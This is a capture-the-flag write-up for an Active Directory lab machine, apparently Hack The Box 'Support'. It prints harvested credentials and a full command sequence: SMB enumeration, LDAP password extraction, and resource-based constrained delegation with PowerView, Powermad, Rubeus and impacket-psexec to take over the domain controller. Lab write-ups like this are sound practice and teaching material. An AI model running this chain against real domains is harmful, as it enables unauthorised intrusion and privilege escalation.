Shell as support

smb allows us to download shares

Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    support-tools   Disk      support staff tools
    SYSVOL          Disk      Logon server share 
 

smbclient //10.10.11.174/support-tools -c 'recurse;ls'

Password for [WORKGROUP\root]:
 .                                   D        0  Wed Jul 20 13:01:06 2022
 ..                                  D        0  Sat May 28 07:18:25 2022
 7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
 npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
 putty.exe                           A  1273576  Sat May 28 07:20:06 2022
 SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
 UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
 windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
 WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

        4026367 blocks of size 4096. 958078 blocks available
 

Located encrytped password and username within the userinfo.exe file

        // Token: 0x04000005 RID: 5
        private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

        // Token: 0x04000006 RID: 6
        private static byte[] key = Encoding.ASCII.GetBytes("armando");

Using chatgpt to decrypt the password 

I actually got stuck here as the password does not work for armando. I looked up a hint and this password is for the ldap user…?

Finding supports password

ldapsearch -H ldap://support.htb -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"| grep -C 30 "sAMAccountName: support"
 

support:Ironside47pleasure40Watchful

Shell as admin

Support has generic all over the domain controller

Following bloodhound we can exploit this.

Commands to exploit this

Import-Module .\Powermad.ps1
Import-Module ./PowerView.ps1
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/DC.support.htb /ptt

We copy the ticket and then decode it using base64

cat b64_ticket.txt | base64 -d > ticket.kirbi

Then we convert the kirbi ticket into a ccache

impacket-ticketConverter ticket.kirbi ticket1.ccache

Export the ticket

export KRB5CCNAME=ticket.ccache

Remote in with FQDN and grab root.txt

impacket-psexec -k support.htb/[email protected] -no-pass